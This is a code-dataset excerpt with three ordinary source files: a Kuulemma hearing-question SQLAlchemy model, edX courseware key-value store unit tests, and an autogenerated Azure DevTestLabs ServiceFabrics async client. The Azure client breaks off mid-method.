repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
City-of-Helsinki/kuulemma | kuulemma/models/question.py | 2 | 3390 | # -*- coding: utf-8 -*-
# Kuulemma
# Copyright (C) 2014, Fast Monkeys Oy
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from sqlalchemy.ext.orderinglist import ordering_list
from kuulemma.extensions import db
from .image import Image
from .text_item_mixin import TextItemMixin
class Question(db.Model, TextItemMixin):
"""
Implements a hearing question, modeled on a hearing alternative.
"""
__versioned__ = {}
__tablename__ = 'question'
id = db.Column(db.Integer, primary_key=True)
hearing_id = db.Column(
db.Integer,
db.ForeignKey(
'hearing.id',
ondelete='CASCADE'
)
)
main_image_id = db.Column(
db.Integer,
db.ForeignKey(
'image.id',
ondelete='CASCADE',
use_alter=True,
name='question_main_image_id_fkey'
)
)
main_image = db.relationship(
Image,
primaryjoin=main_image_id == Image.id,
post_update=True,
backref=db.backref('question_main', uselist=False)
)
images = db.relationship(
Image,
primaryjoin=id == Image.question_id,
cascade='all, delete-orphan',
passive_deletes=True,
order_by=Image.position,
collection_class=ordering_list('position'),
backref='question'
)
position = db.Column(db.Integer)
@property
def related_hearing(self):
from .hearing import Hearing
return Hearing.query.get(self.hearing_id)
@property
def letter(self):
ASCII_INDEX_OF_A = 65
position = self.position or 0
return chr(ASCII_INDEX_OF_A + position)
@property
def commentable_id(self):
return 'question-{id}'.format(id=self.id)
@property
def commentable_name(self):
return 'Kysymys {letter}'.format(letter=self.letter)
@property
def commentable_option(self):
"""
Returns a "id:name" string representation that can be used in the
frontend when commenting on this section.
"""
return '{id}:{name}'.format(
id=self.commentable_id,
name=self.commentable_name
)
def get_commentable_sections_string(self):
"""
Return in string format id, name pairs of all the commentable sections
related to this alternative.
"""
sections = []
sections.append(self.commentable_option)
if self.images:
if self.main_image:
sections.append(
self.main_image.commentable_option
)
for image in self.images:
sections.append(
image.commentable_option
)
return ';'.join(sections)
| agpl-3.0 | -1,828,551,257,976,780,800 | 27.487395 | 78 | 0.613274 | false |
andyzsf/edx | lms/djangoapps/courseware/tests/test_model_data.py | 4 | 15805 | """
Test for lms courseware app, module data (runtime data storage for XBlocks)
"""
import json
from mock import Mock, patch
from functools import partial
from courseware.model_data import DjangoKeyValueStore
from courseware.model_data import InvalidScopeError, FieldDataCache
from courseware.models import StudentModule
from courseware.models import XModuleStudentInfoField, XModuleStudentPrefsField
from student.tests.factories import UserFactory
from courseware.tests.factories import StudentModuleFactory as cmfStudentModuleFactory, location, course_id
from courseware.tests.factories import UserStateSummaryFactory
from courseware.tests.factories import StudentPrefsFactory, StudentInfoFactory
from xblock.fields import Scope, BlockScope, ScopeIds
from django.test import TestCase
from django.db import DatabaseError
from xblock.exceptions import KeyValueMultiSaveError
def mock_field(scope, name):
field = Mock()
field.scope = scope
field.name = name
return field
def mock_descriptor(fields=[]):
descriptor = Mock()
descriptor.scope_ids = ScopeIds('user1', 'mock_problem', location('def_id'), location('usage_id'))
descriptor.module_class.fields.values.return_value = fields
descriptor.fields.values.return_value = fields
descriptor.module_class.__name__ = 'MockProblemModule'
return descriptor
# The user ids here are 1 because we make a student in the setUp functions, and
# they get an id of 1. There's an assertion in setUp to ensure that assumption
# is still true.
user_state_summary_key = partial(DjangoKeyValueStore.Key, Scope.user_state_summary, None, location('usage_id'))
settings_key = partial(DjangoKeyValueStore.Key, Scope.settings, None, location('usage_id'))
user_state_key = partial(DjangoKeyValueStore.Key, Scope.user_state, 1, location('usage_id'))
prefs_key = partial(DjangoKeyValueStore.Key, Scope.preferences, 1, 'mock_problem')
user_info_key = partial(DjangoKeyValueStore.Key, Scope.user_info, 1, None)
class StudentModuleFactory(cmfStudentModuleFactory):
module_state_key = location('usage_id')
course_id = course_id
class TestInvalidScopes(TestCase):
def setUp(self):
self.user = UserFactory.create(username='user')
self.field_data_cache = FieldDataCache([mock_descriptor([mock_field(Scope.user_state, 'a_field')])], course_id, self.user)
self.kvs = DjangoKeyValueStore(self.field_data_cache)
def test_invalid_scopes(self):
for scope in (Scope(user=True, block=BlockScope.DEFINITION),
Scope(user=False, block=BlockScope.TYPE),
Scope(user=False, block=BlockScope.ALL)):
key = DjangoKeyValueStore.Key(scope, None, None, 'field')
self.assertRaises(InvalidScopeError, self.kvs.get, key)
self.assertRaises(InvalidScopeError, self.kvs.set, key, 'value')
self.assertRaises(InvalidScopeError, self.kvs.delete, key)
self.assertRaises(InvalidScopeError, self.kvs.has, key)
self.assertRaises(InvalidScopeError, self.kvs.set_many, {key: 'value'})
class OtherUserFailureTestMixin(object):
"""
Mixin class to add test cases for failures when a user trying to use the kvs is not
the one that instantiated the kvs.
Doing a mixin rather than modifying StorageTestBase (below) because some scopes don't fail in this case, because
they aren't bound to a particular user
assumes that this is mixed into a class that defines other_key_factory and existing_field_name
"""
def test_other_user_kvs_get_failure(self):
"""
Test for assert failure when a user who didn't create the kvs tries to get from it it
"""
with self.assertRaises(AssertionError):
self.kvs.get(self.other_key_factory(self.existing_field_name))
def test_other_user_kvs_set_failure(self):
"""
Test for assert failure when a user who didn't create the kvs tries to get from it it
"""
with self.assertRaises(AssertionError):
self.kvs.set(self.other_key_factory(self.existing_field_name), "new_value")
class TestStudentModuleStorage(OtherUserFailureTestMixin, TestCase):
"""Tests for user_state storage via StudentModule"""
other_key_factory = partial(DjangoKeyValueStore.Key, Scope.user_state, 2, location('usage_id')) # user_id=2, not 1
existing_field_name = "a_field"
def setUp(self):
student_module = StudentModuleFactory(state=json.dumps({'a_field': 'a_value', 'b_field': 'b_value'}))
self.user = student_module.student
self.assertEqual(self.user.id, 1) # check our assumption hard-coded in the key functions above.
self.field_data_cache = FieldDataCache([mock_descriptor([mock_field(Scope.user_state, 'a_field')])], course_id, self.user)
self.kvs = DjangoKeyValueStore(self.field_data_cache)
def test_get_existing_field(self):
"Test that getting an existing field in an existing StudentModule works"
self.assertEquals('a_value', self.kvs.get(user_state_key('a_field')))
def test_get_missing_field(self):
"Test that getting a missing field from an existing StudentModule raises a KeyError"
self.assertRaises(KeyError, self.kvs.get, user_state_key('not_a_field'))
def test_set_existing_field(self):
"Test that setting an existing user_state field changes the value"
self.kvs.set(user_state_key('a_field'), 'new_value')
self.assertEquals(1, StudentModule.objects.all().count())
self.assertEquals({'b_field': 'b_value', 'a_field': 'new_value'}, json.loads(StudentModule.objects.all()[0].state))
def test_set_missing_field(self):
"Test that setting a new user_state field changes the value"
self.kvs.set(user_state_key('not_a_field'), 'new_value')
self.assertEquals(1, StudentModule.objects.all().count())
self.assertEquals({'b_field': 'b_value', 'a_field': 'a_value', 'not_a_field': 'new_value'}, json.loads(StudentModule.objects.all()[0].state))
def test_delete_existing_field(self):
"Test that deleting an existing field removes it from the StudentModule"
self.kvs.delete(user_state_key('a_field'))
self.assertEquals(1, StudentModule.objects.all().count())
self.assertRaises(KeyError, self.kvs.get, user_state_key('not_a_field'))
def test_delete_missing_field(self):
"Test that deleting a missing field from an existing StudentModule raises a KeyError"
self.assertRaises(KeyError, self.kvs.delete, user_state_key('not_a_field'))
self.assertEquals(1, StudentModule.objects.all().count())
self.assertEquals({'b_field': 'b_value', 'a_field': 'a_value'}, json.loads(StudentModule.objects.all()[0].state))
def test_has_existing_field(self):
"Test that `has` returns True for existing fields in StudentModules"
self.assertTrue(self.kvs.has(user_state_key('a_field')))
def test_has_missing_field(self):
"Test that `has` returns False for missing fields in StudentModule"
self.assertFalse(self.kvs.has(user_state_key('not_a_field')))
def construct_kv_dict(self):
"""Construct a kv_dict that can be passed to set_many"""
key1 = user_state_key('field_a')
key2 = user_state_key('field_b')
new_value = 'new value'
newer_value = 'newer value'
return {key1: new_value, key2: newer_value}
def test_set_many(self):
"Test setting many fields that are scoped to Scope.user_state"
kv_dict = self.construct_kv_dict()
self.kvs.set_many(kv_dict)
for key in kv_dict:
self.assertEquals(self.kvs.get(key), kv_dict[key])
def test_set_many_failure(self):
"Test failures when setting many fields that are scoped to Scope.user_state"
kv_dict = self.construct_kv_dict()
# because we're patching the underlying save, we need to ensure the
# fields are in the cache
for key in kv_dict:
self.kvs.set(key, 'test_value')
with patch('django.db.models.Model.save', side_effect=DatabaseError):
with self.assertRaises(KeyValueMultiSaveError) as exception_context:
self.kvs.set_many(kv_dict)
self.assertEquals(len(exception_context.exception.saved_field_names), 0)
class TestMissingStudentModule(TestCase):
def setUp(self):
self.user = UserFactory.create(username='user')
self.assertEqual(self.user.id, 1) # check our assumption hard-coded in the key functions above.
self.field_data_cache = FieldDataCache([mock_descriptor()], course_id, self.user)
self.kvs = DjangoKeyValueStore(self.field_data_cache)
def test_get_field_from_missing_student_module(self):
"Test that getting a field from a missing StudentModule raises a KeyError"
self.assertRaises(KeyError, self.kvs.get, user_state_key('a_field'))
def test_set_field_in_missing_student_module(self):
"Test that setting a field in a missing StudentModule creates the student module"
self.assertEquals(0, len(self.field_data_cache.cache))
self.assertEquals(0, StudentModule.objects.all().count())
self.kvs.set(user_state_key('a_field'), 'a_value')
self.assertEquals(1, len(self.field_data_cache.cache))
self.assertEquals(1, StudentModule.objects.all().count())
student_module = StudentModule.objects.all()[0]
self.assertEquals({'a_field': 'a_value'}, json.loads(student_module.state))
self.assertEquals(self.user, student_module.student)
self.assertEquals(location('usage_id').replace(run=None), student_module.module_state_key)
self.assertEquals(course_id, student_module.course_id)
def test_delete_field_from_missing_student_module(self):
"Test that deleting a field from a missing StudentModule raises a KeyError"
self.assertRaises(KeyError, self.kvs.delete, user_state_key('a_field'))
def test_has_field_for_missing_student_module(self):
"Test that `has` returns False for missing StudentModules"
self.assertFalse(self.kvs.has(user_state_key('a_field')))
class StorageTestBase(object):
"""
A base class for that gets subclassed when testing each of the scopes.
"""
# Disable pylint warnings that arise because of the way the child classes call
# this base class -- pylint's static analysis can't keep up with it.
# pylint: disable=no-member, not-callable
factory = None
scope = None
key_factory = None
storage_class = None
def setUp(self):
field_storage = self.factory.create()
if hasattr(field_storage, 'student'):
self.user = field_storage.student
else:
self.user = UserFactory.create()
self.mock_descriptor = mock_descriptor([
mock_field(self.scope, 'existing_field'),
mock_field(self.scope, 'other_existing_field')])
self.field_data_cache = FieldDataCache([self.mock_descriptor], course_id, self.user)
self.kvs = DjangoKeyValueStore(self.field_data_cache)
def test_set_and_get_existing_field(self):
self.kvs.set(self.key_factory('existing_field'), 'test_value')
self.assertEquals('test_value', self.kvs.get(self.key_factory('existing_field')))
def test_get_existing_field(self):
"Test that getting an existing field in an existing Storage Field works"
self.assertEquals('old_value', self.kvs.get(self.key_factory('existing_field')))
def test_get_missing_field(self):
"Test that getting a missing field from an existing Storage Field raises a KeyError"
self.assertRaises(KeyError, self.kvs.get, self.key_factory('missing_field'))
def test_set_existing_field(self):
"Test that setting an existing field changes the value"
self.kvs.set(self.key_factory('existing_field'), 'new_value')
self.assertEquals(1, self.storage_class.objects.all().count())
self.assertEquals('new_value', json.loads(self.storage_class.objects.all()[0].value))
def test_set_missing_field(self):
"Test that setting a new field changes the value"
self.kvs.set(self.key_factory('missing_field'), 'new_value')
self.assertEquals(2, self.storage_class.objects.all().count())
self.assertEquals('old_value', json.loads(self.storage_class.objects.get(field_name='existing_field').value))
self.assertEquals('new_value', json.loads(self.storage_class.objects.get(field_name='missing_field').value))
def test_delete_existing_field(self):
"Test that deleting an existing field removes it"
self.kvs.delete(self.key_factory('existing_field'))
self.assertEquals(0, self.storage_class.objects.all().count())
def test_delete_missing_field(self):
"Test that deleting a missing field from an existing Storage Field raises a KeyError"
self.assertRaises(KeyError, self.kvs.delete, self.key_factory('missing_field'))
self.assertEquals(1, self.storage_class.objects.all().count())
def test_has_existing_field(self):
"Test that `has` returns True for an existing Storage Field"
self.assertTrue(self.kvs.has(self.key_factory('existing_field')))
def test_has_missing_field(self):
"Test that `has` return False for an existing Storage Field"
self.assertFalse(self.kvs.has(self.key_factory('missing_field')))
def construct_kv_dict(self):
"""Construct a kv_dict that can be passed to set_many"""
key1 = self.key_factory('existing_field')
key2 = self.key_factory('other_existing_field')
new_value = 'new value'
newer_value = 'newer value'
return {key1: new_value, key2: newer_value}
def test_set_many(self):
"""Test that setting many regular fields at the same time works"""
kv_dict = self.construct_kv_dict()
self.kvs.set_many(kv_dict)
for key in kv_dict:
self.assertEquals(self.kvs.get(key), kv_dict[key])
def test_set_many_failure(self):
"""Test that setting many regular fields with a DB error """
kv_dict = self.construct_kv_dict()
for key in kv_dict:
self.kvs.set(key, 'test value')
with patch('django.db.models.Model.save', side_effect=[None, DatabaseError]):
with self.assertRaises(KeyValueMultiSaveError) as exception_context:
self.kvs.set_many(kv_dict)
exception = exception_context.exception
self.assertEquals(len(exception.saved_field_names), 1)
self.assertEquals(exception.saved_field_names[0], 'existing_field')
class TestUserStateSummaryStorage(StorageTestBase, TestCase):
"""Tests for UserStateSummaryStorage"""
factory = UserStateSummaryFactory
scope = Scope.user_state_summary
key_factory = user_state_summary_key
storage_class = factory.FACTORY_FOR
class TestStudentPrefsStorage(OtherUserFailureTestMixin, StorageTestBase, TestCase):
"""Tests for StudentPrefStorage"""
factory = StudentPrefsFactory
scope = Scope.preferences
key_factory = prefs_key
storage_class = XModuleStudentPrefsField
other_key_factory = partial(DjangoKeyValueStore.Key, Scope.preferences, 2, 'mock_problem') # user_id=2, not 1
existing_field_name = "existing_field"
class TestStudentInfoStorage(OtherUserFailureTestMixin, StorageTestBase, TestCase):
"""Tests for StudentInfoStorage"""
factory = StudentInfoFactory
scope = Scope.user_info
key_factory = user_info_key
storage_class = XModuleStudentInfoField
other_key_factory = partial(DjangoKeyValueStore.Key, Scope.user_info, 2, 'mock_problem') # user_id=2, not 1
existing_field_name = "existing_field"
| agpl-3.0 | -2,841,379,221,693,809,700 | 45.485294 | 149 | 0.691933 | false |
Azure/azure-sdk-for-python | sdk/devtestlabs/azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/aio/operations/_service_fabrics_operations.py | 1 | 41637 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ServiceFabricsOperations:
"""ServiceFabricsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.devtestlabs.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
expand: Optional[str] = None,
filter: Optional[str] = None,
top: Optional[int] = None,
orderby: Optional[str] = None,
**kwargs
) -> AsyncIterable["_models.ServiceFabricList"]:
"""List service fabrics in a given user profile.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param expand: Specify the $expand query. Example: 'properties($expand=applicableSchedule)'.
:type expand: str
:param filter: The filter to apply to the operation. Example: '$filter=contains(name,'myName').
:type filter: str
:param top: The maximum number of resources to return from the operation. Example: '$top=10'.
:type top: int
:param orderby: The ordering expression for the results, using OData notation. Example:
'$orderby=name desc'.
:type orderby: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ServiceFabricList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.devtestlabs.models.ServiceFabricList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceFabricList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ServiceFabricList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics'} # type: ignore
async def get(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
expand: Optional[str] = None,
**kwargs
) -> "_models.ServiceFabric":
"""Get service fabric.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:param expand: Specify the $expand query. Example: 'properties($expand=applicableSchedule)'.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ServiceFabric, or the result of cls(response)
:rtype: ~azure.mgmt.devtestlabs.models.ServiceFabric
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceFabric"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ServiceFabric', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
service_fabric: "_models.ServiceFabric",
**kwargs
) -> "_models.ServiceFabric":
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceFabric"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(service_fabric, 'ServiceFabric')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ServiceFabric', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ServiceFabric', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
service_fabric: "_models.ServiceFabric",
**kwargs
) -> AsyncLROPoller["_models.ServiceFabric"]:
"""Create or replace an existing service fabric. This operation can take a while to complete.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:param service_fabric: A Service Fabric.
:type service_fabric: ~azure.mgmt.devtestlabs.models.ServiceFabric
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either ServiceFabric or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.devtestlabs.models.ServiceFabric]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ServiceFabric"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
lab_name=lab_name,
user_name=user_name,
name=name,
service_fabric=service_fabric,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ServiceFabric', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/users/{userName}/servicefabrics/{name}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
lab_name: str,
user_name: str,
name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Delete service fabric. This operation can take a while to complete.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param user_name: The name of the user profile.
:type user_name: str
:param name: The name of the service fabric.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
lab_name=lab_name,
user_name=user_name,
name=name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'userName': self._serialize.url("user_name", user_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
